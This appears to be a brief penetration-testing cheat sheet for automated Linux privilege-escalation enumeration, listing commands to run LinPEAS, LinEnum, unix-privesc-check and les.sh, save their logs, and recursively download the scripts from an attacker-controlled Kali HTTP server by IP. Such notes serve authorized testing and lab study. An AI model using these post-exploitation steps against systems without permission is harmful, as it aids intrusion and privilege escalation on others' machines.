Automated Linux Enumeration (LinPEAS / LinEnum)
LinPEAS
./linpeas.sh
LinEnum
./LinEnum.sh
unix-privesc-check
unix-privesc-check standard > output.txt
unix-privesc-check detailed > output.txt
Mass enum one-liner
/tmp/test/linpeas.sh | tee linpeas.log && /tmp/test/les.sh -i | tee les.log
Review collected output
cat *.log
less -R *.log
Pull all enum scripts from your Kali HTTP server
wget -nH -r 10.13.31.108 && rm index.html
chmod +x *.sh